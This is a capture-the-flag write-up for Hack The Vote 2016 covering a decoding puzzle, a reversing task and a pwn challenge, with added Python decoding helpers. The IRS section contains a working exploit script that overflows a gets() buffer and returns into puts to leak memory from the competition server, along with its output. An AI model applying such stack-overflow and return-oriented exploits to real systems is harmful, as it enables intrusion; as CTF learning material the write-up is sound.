Hack The Vote 2016 Writeup

I took part in Hack The Vote 2016 and finished 244th with 251 points.

Sanity (Vote 1)

A sanity-check freebie.

The flag is flag{th3r3_1s_0nly_on3_ch0ic3}

TOPKEK (Crypto 50)

The following text file is provided.

$ cat kek.43319559636b94db1c945834340b65d68f90b6ecbb70925f7b24f6efc5c2524e.txt
KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP!! KEK!!! TOP!! KEK!!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP!!!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!!!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP!! KEK! TOP!!!! KEK!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK!!!!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK!! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP!!! KEK!! TOP! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK!! TOP!!! KEK! TOP! KEK!! TOP! KEK!!!! TOP!!! KEK! TOP! KEK!!! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP!!! KEK!!! TOP!! KEK!!!!! TOP! KEK! TOP! KEK! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK!! TOP!! KEK! TOP! KEK!!! TOP! KEK! TOP! KEK!! TOP! KEK!!! TOP!! KEK!! TOP!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!!!! KEK!! TOP! KEK!! TOP!! KEK!!!!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK! TOP! KEK!!!!! TOP!! KEK! TOP! KEK!!! TOP!!! KEK! TOP!! KEK!!! TOP!! KEK!!! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP!! KEK!! TOP!! KEK!! TOP!!! KEK! TOP! KEK! TOP! KEK! TOP!! KEK! TOP!!! KEK!! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK! TOP!!!!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP! KEK!! TOP! KEK! TOP!! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK!! TOP! KEK!!!! TOP! KEK! TOP!!!!! KEK! TOP!

Read KEK as 0 and TOP as 1, repeat each digit once per trailing "!", treat the result as a binary string, and convert it to hex: the flag falls out.

# Python 2. Each token is KEK (bit 0) or TOP (bit 1) followed by '!' * run length.
data = open('kek.43319559636b94db1c945834340b65d68f90b6ecbb70925f7b24f6efc5c2524e.txt').read()
s = ''
for word in data.split():
    if 'KEK' in word:
        c = '0'
    else:
        c = '1'
    s += c * (len(word)-3)   # len('KEK') == len('TOP') == 3; the rest are '!'
s = "%x" % int(s, 2)         # binary string -> hex string
print s.decode('hex')        # hex -> ASCII flag
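The script above leans on int(s, 2), which silently drops leading zero bits; that is harmless here (the flag starts with 'f', 0x66) but would shift every byte if the first byte were below 0x10. As an added Python 3 example (not the writeup's code), here is a decoder that validates the KEK/TOP token grammar and slices whole octets instead, together with the inverse encoder so the format can be round-tripped; SAMPLE is the opening of the challenge file copied from above.

```python
import re

# Token grammar from the challenge file: "KEK" (bit 0) or "TOP" (bit 1)
# followed by one or more '!' giving the run length of that bit.
TOKEN = re.compile(r"^(KEK|TOP)(!+)$")

def topkek_decode(text):
    """Decode KEK/TOP run-length text into bytes.

    The bit string is cut into whole octets rather than passed through
    int(bits, 2), so leading zero bits survive, and a trailing partial
    octet is rejected instead of being silently mis-aligned.
    """
    bits = []
    for word in text.split():
        m = TOKEN.match(word)
        if not m:
            raise ValueError("bad token: %r" % word)
        bits.append(("0" if m.group(1) == "KEK" else "1") * len(m.group(2)))
    s = "".join(bits)
    if len(s) % 8:
        raise ValueError("bit length %d is not a multiple of 8" % len(s))
    return bytes(int(s[i:i + 8], 2) for i in range(0, len(s), 8))

def topkek_encode(data):
    """Inverse: run-length encode the bits of `data` as KEK!/TOP! tokens."""
    s = "".join(format(b, "08b") for b in data)
    out = []
    for m in re.finditer(r"0+|1+", s):
        run = m.group(0)
        out.append(("KEK" if run[0] == "0" else "TOP") + "!" * len(run))
    return " ".join(out)

# First 16 tokens of the challenge file (copied from above); they spell "flag".
SAMPLE = ("KEK! TOP!! KEK!! TOP!! KEK!! TOP!! KEK! TOP!! "
          "KEK!!! TOP!! KEK!!!! TOP! KEK! TOP!! KEK!! TOP!!!")
```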

Consul (Reversing 100)

The function c8 prints the string b after adding the value of the variable mem to each of its bytes.

.text:0000000000400A09                 public c8
.text:0000000000400A09 c8              proc near
.text:0000000000400A09                 push    rbp
.text:0000000000400A0A                 mov     rbp, rsp
.text:0000000000400A0D                 mov     eax, cs:mem
.text:0000000000400A13                 add     eax, 9
.text:0000000000400A16                 mov     cs:mem, eax
.text:0000000000400A1C                 mov     edi, offset b
.text:0000000000400A21                 call    add_mem
.text:0000000000400A26                 mov     rsi, rax
.text:0000000000400A29                 mov     edi, offset format ; "%s\r\n"
.text:0000000000400A2E                 mov     eax, 0
.text:0000000000400A33                 call    _printf
.text:0000000000400A38                 pop     rbp
.text:0000000000400A39                 retn
.text:0000000000400A39 c8              endp
0000000000601280  26 2C 21 27 3B 37 32 29  34 25 1F 29 2E 1F 22 25  &,!';72)4%.).."%
0000000000601290  32 2E 29 25 E1 3D 00 00  00 00 00 00 00 00 00 00  2.)%.=..........

Guessing that 26 2C 21 27 corresponds to 66 6C 61 67 ("flag"), I added 0x40 to each byte and got the flag.

$ python
Python 2.7.12 (default, Jul  1 2016, 15:12:24)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> x = """26 2C 21 27 3B 37 32 29  34 25 1F 29 2E 1F 22 25
... 32 2E 29 25 E1 3D"""
>>> x = x.replace('\n', '').replace(' ', '').decode('hex')
>>> ''.join(chr((ord(c)+0x40) % 0x100) for c in x)
'flag{write_in_bernie!}'
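The 0x40 above was a guess that happened to match the value of mem at the time of the call. Since c8 adds 9 to mem on every invocation (the add eax, 9 in the listing), the constant depends on how many times the routine has run, so the safer habit is to derive it from the known plaintext prefix and check that one constant fits the whole prefix. Added Python 3 example, not part of the writeup; B is the dump of b copied from 0x601280 above, up to the NUL.

```python
def recover_add_key(cipher, known_prefix):
    """Return the byte k with (c + k) % 256 == p for every position of
    known_prefix, or None if no single constant fits all of them."""
    if not known_prefix or len(known_prefix) > len(cipher):
        return None
    k = (known_prefix[0] - cipher[0]) % 256       # candidate from first byte
    for c, p in zip(cipher, known_prefix):        # verify over the prefix
        if (c + k) % 256 != p:
            return None
    return k

def add_decode(cipher, k):
    """Undo c8's per-byte addition (modulo 256, so 0xE1 + 0x40 wraps to '!')."""
    return bytes((c + k) % 256 for c in cipher)

# Bytes of `b` from the hex dump at 0x601280 above, up to the terminating NUL.
B = bytes.fromhex("26 2C 21 27 3B 37 32 29 34 25 1F 29 2E 1F 22 25 32 2E 29 25 E1 3D")

def solve_consul(cipher=B, prefix=b"flag"):
    """Recover the constant from the known 'flag' prefix and decode."""
    k = recover_add_key(cipher, prefix)
    return None if k is None else add_decode(cipher, k)
```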

IRS (Exploitation 100)

After choosing Edit, the y/n confirmation is read with gets(), so there is a stack buffer overflow.

.text:080488FD 68 BE 92 04 08                    push    offset aYN      ; "y/n\r"
.text:08048902 E8 F1 FB FF FF                    call    puts
.text:08048907 83 C4 10                          add     esp, 10h
.text:0804890A 83 EC 0C                          sub     esp, 0Ch
.text:0804890D 8D 45 EB                          lea     eax, [ebp+s]
.text:08048910 50                                push    eax             ; s
.text:08048911 E8 C2 FB FF FF                    call    gets

Following the hint, the flag is obtained by making the program print the code at the location where the string not_the_flag is built.

Hint: not_the_flag will actually be the flag on the server

from minipwn import *   # small pwn helper library providing sendline/recvuntil/p32

def menu_file(s, name, password, income, deductible):
    # Menu 1: file a tax return (creates the entry that will be edited)
    print s.recv(8192)
    sendline(s, '1')
    print recvuntil(s, ': ')
    sendline(s, name)
    print recvuntil(s, ': ')
    sendline(s, password)
    print recvuntil(s, ': ')
    sendline(s, str(income))
    print recvuntil(s, ': ')
    sendline(s, str(deductible))
    print recvuntil(s, '!\r\n')

def menu_edit(s, name, password, income, deductible, yorn):
    # Menu 3: edit a tax return; the final y/n answer is the one read with gets()
    print s.recv(8192)
    sendline(s, '3')
    print recvuntil(s, ': ')
    sendline(s, name)
    print recvuntil(s, ': ')
    sendline(s, password)
    print recvuntil(s, ': ')
    sendline(s, str(income))
    print recvuntil(s, ': ')
    sendline(s, str(deductible))
    print recvuntil(s, 'y/n\r\n')
    sendline(s, yorn)
    print recvuntil(s, '!\r\n')

#s = connect_process(['./irs.4ded467171bb532f7dba8e8fe42a1fc121aa1498a3f1748064755e2566593360'])   # local binary
s = socket.create_connection(('irs.pwn.republican', 4127))
raw_input()   # pause here (e.g. to attach a debugger) before sending anything
menu_file(s, 'AAAA', 'BBBB', 100, 100)

plt_puts = 0x80484F8    # puts@plt
addr_text = 0x8048AC2   # .text address where not_the_flag is assembled

buf = 'A' * 25          # fill the local buffer and saved ebp up to the return address
buf += p32(plt_puts) + 'AAAA' + p32(addr_text)   # return into puts(addr_text); 'AAAA' is puts's return address

menu_edit(s, 'AAAA', 'BBBB', 100, 100, buf)
data = s.recv(8192)
print "%r" % data

$ python test.py

Welcome to the IRS!
How may we serve you today?
1. File a tax return
2. Delete a tax return
3. Edit a tax return
4. View a tax return
5. Exit

Tax returns on file:
0 - Donald Trump

Enter the name:
Enter the password:
Enter the income:
Enter the deductions:
Thank you for doing your civic duty AAAA!

Welcome to the IRS!
How may we serve you today?
1. File a tax return
2. Delete a tax return
3. Edit a tax return
4. View a tax return
5. Exit

Tax returns on file:
0 - Donald Trump
1 - AAAA

Enter the name of the file to edit:
Enter the password:
Enter the new income:
Enter the new deductible:
Is this correct?
Income: 100
Deductible: 100
y/n

Your changes have been recorded!

'flag\xc7@\x04{c4n\xc7@\x08_1_g\xc7@\x0c3t_a\xc7@\x10_r3f\xc7@\x14und}\x8bE\xf0\xc7@d\xff\x9frN\x8bE\xf0\xc7@h\xff\x9frN\x8bE\xf0\x89E\xd0\x83\xec\x0c\x8dE\xd0P\xe8,\xfb\xff\xff\x83\xc4\x10\xa1 \xb0\x04\x08\x83\xec\x04Pj\x03\x8dE\xe5P\xe8\xc2\xf9\xff\xff\x83\xc4\x10\x83\xec\x04j2j\n'

$ echo -en 'flag\xc7@\x04{c4n\xc7@\x08_1_g\xc7@\x0c3t_a\xc7@\x10_r3f\xc7@\x14und}\x8bE\xf0\xc7@d\xff\x9frN\x8bE\xf0\xc7@h\xff\x9frN\x8bE\xf0\x89E\xd0\x83\xec\x0c\x8dE\xd0P\xe8,\xfb\xff\xff\x83\xc4\x10\xa1 \xb0\x04\x08\x83\xec\x04Pj\x03\x8dE\xe5P\xe8\xc2\xf9\xff\xff\x83\xc4\x10\x83\xec\x04j2j\n' | strings | tr -d '\n'
flag{c4n_1_g3t_a_r3fund}
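The strings | tr trick works because the flag is built as a stack string: a run of mov dword ptr [eax+disp8], imm32 stores (bytes C7 40 disp imm32), and each immediate happens to be four printable characters. As an added Python 3 example (not from the writeup), here is a parser that reassembles such a string by stack offset rather than by printability, which also ignores the later non-printable stores at +0x64 and +0x68. LEAK is the writeup's own leaked output, truncated; the leak begins with the immediate of the first store because puts was pointed past that instruction's opcode bytes, which the parser treats as the store at offset 0.

```python
import re
import struct

# Leaked bytes from the writeup's output, truncated after the +0x68 store.
# The first four bytes are the imm32 of the initial `mov [eax], imm32` whose
# opcode lies before the address passed to puts (assumption from the bytes).
LEAK = (b"flag\xc7@\x04{c4n\xc7@\x08_1_g\xc7@\x0c3t_a\xc7@\x10_r3f\xc7@\x14und}"
        b"\x8bE\xf0\xc7@d\xff\x9frN\x8bE\xf0\xc7@h\xff\x9frN")

# x86 encoding: C7 40 disp8 imm32  ==  mov dword ptr [eax+disp8], imm32
STORE = re.compile(rb"\xc7\x40(.)(.{4})", re.DOTALL)

def collect_stores(leak, first_imm_offset=0):
    """Map stack offset -> the 4 bytes stored there.

    The leading 4 bytes are taken as the immediate of the cut-off first
    store; every later C7 40 disp imm32 pattern is decoded normally.
    """
    stores = {first_imm_offset: leak[:4]}
    for m in STORE.finditer(leak, 4):
        disp = struct.unpack("b", m.group(1))[0]   # disp8 is signed
        stores[disp] = m.group(2)
    return stores

def stack_string(stores, start=0):
    """Walk contiguous 4-byte stores from `start`; stop at a gap or a NUL.

    Non-adjacent stores (here +0x64 and +0x68, which hold other locals)
    are never concatenated into the string.
    """
    out = bytearray()
    off = start
    while off in stores:
        chunk = stores[off]
        if b"\x00" in chunk:                       # terminator inside a store
            out += chunk.split(b"\x00")[0]
            break
        out += chunk
        off += 4
    return bytes(out)

def irs_flag(leak=LEAK):
    return stack_string(collect_stores(leak))
```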

Thoughts

Other challenges I would have liked to solve are listed below.

Related links